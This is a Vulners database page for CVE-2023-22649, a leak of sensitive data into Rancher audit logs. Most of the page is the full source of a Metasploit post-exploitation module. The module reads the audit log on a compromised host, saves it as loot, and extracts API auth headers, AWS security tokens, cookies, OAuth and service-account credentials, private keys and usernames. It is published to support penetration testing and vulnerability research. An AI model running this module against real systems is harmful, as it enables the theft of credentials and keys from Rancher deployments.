Vulners
Lucene search
Rancher Audit Log Sensitive Information Leak
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2023-22649 | 10 Apr 202416:08 | – | circl |
 | Rancher 日志信息泄露漏洞 | 16 Oct 202400:00 | – | cnnvd |
 | CVE-2023-22649 | 16 Oct 202407:46 | – | cve |
 | CVE-2023-22649 Rancher 'Audit Log' leaks sensitive information | 16 Oct 202407:46 | – | cvelist |
 | Rancher 'Audit Log' leaks sensitive information | 8 Feb 202418:44 | – | github |
 | CVE-2023-22649 | 16 Oct 202408:15 | – | nvd |
 | CVE-2023-22649 | 16 Oct 202408:15 | – | osv |
| GHSA-XFJ7-QF8W-2GCR Rancher 'Audit Log' leaks sensitive information | 8 Feb 202418:44 | – | osv |
| GO-2024-2537 Rancher 'Audit Log' leaks sensitive information in github.com/rancher/rancher | 28 Jun 202415:28 | – | osv |
 | PT-2024-11971 · Rancher · Rancher | 8 Feb 202400:00 | – | ptsecurity |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Rancher Audit Log Sensitive Information Leak',
'Description' => %q{
Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive
contain a vulnerability where sensitive data is leaked into the audit logs.
Rancher Audit Logging is an opt-in feature, only deployments that have it
enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.
Tested against rancher 2.6.0.
},
'License' => MSF_LICENSE,
'Author' => [
'h00die', # msf module
],
'Platform' => ['linux', 'unix'],
'SessionTypes' => ['shell', 'meterpreter'],
'References' => [
[ 'GHSA', 'xfj7-qf8w-2gcr' ],
[ 'URL', 'https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options'],
[ 'CVE', '2023-22649']
],
'DisclosureDate' => '2024-02-08',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_advanced_options [
OptString.new('LOGFILE', [ true, 'The log file to analyze', '/var/log/auditlog/rancher-api-audit.log' ])
]
end
def run
# docker install, and default path according to https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options
fail_with Failure::BadConfig, "#{datastore['LOGFILE']} is not readable or not found" unless readable?(datastore['LOGFILE'])
log = read_file(datastore['LOGFILE'])
loot = store_loot('rancher.api.log', 'text/plain', session, log, 'rancher.api.txt', 'Rancher API Log')
print_good("Rancher log saved to: #{loot}")
usernames_found = []
table = Rex::Text::Table.new('Header' => 'Leaked Information', 'Indent' => 1, 'Columns' => ['Field', 'Value', 'Location'])
log.each_line do |line|
leaky_request_headers = ['X-Api-Auth-Header', 'X-Amz-Security-Token']
leaky_response_headers = ['X-Api-Set-Cookie-Header']
leaky_request_body = ['credentials', 'applicationSecret', 'oauthCredential', 'serviceAccountCredential', 'spKey', 'spCert', 'certificate', 'privateKey']
json_line = JSON.parse(line)
if json_line.key? 'requestHeader'
leaky_request_headers.each do |leaky_field|
next unless json_line['requestHeader'].key? leaky_field
secret = json_line['requestHeader'][leaky_field]
secret = secret.join(' ') if secret.is_a?(Array)
print_good("Found #{leaky_field} #{secret}")
table << [leaky_field, secret, 'requestHeader']
end
end
if json_line.key? 'responseHeader'
leaky_response_headers.each do |leaky_field|
next unless json_line['responseHeader'].key? leaky_field
secret = json_line['responseHeader'][leaky_field]
secret = secret.join(' ') if secret.is_a?(Array)
print_good("Found #{leaky_field}: #{secret}")
table << [leaky_field, secret, 'responseHeader']
end
end
if json_line.key? 'requestBody'
leaky_request_body.each do |leaky_field|
next unless json_line['requestBody'].key? leaky_field
secret = json_line['requestBody'][leaky_field]
secret = secret.join(' ') if secret.is_a?(Array)
print_good("Found #{leaky_field} in #{secret}")
table << [leaky_field, secret, 'requestBody']
end
end
if json_line.key? 'responseBody'
leaky_request_body.each do |leaky_field|
next unless json_line['responseBody'].key? leaky_field
secret = json_line['responseBody'][leaky_field]
secret = secret.join(' ') if secret.is_a?(Array)
print_good("Found #{leaky_field} in #{secret}")
table << [leaky_field, secret, 'responseBody']
end
end
usernames = json_line.dig('user', 'extra', 'username')
next if usernames.nil?
usernames_found += usernames
end
usernames_found.uniq.each do |username|
table << ['Username', username, 'Requests']
end
print_line
print_line(table.to_s)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jun 2026 19:01Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.16.5 - 8.4
CVSS 48.4
EPSS0.4519
SSVC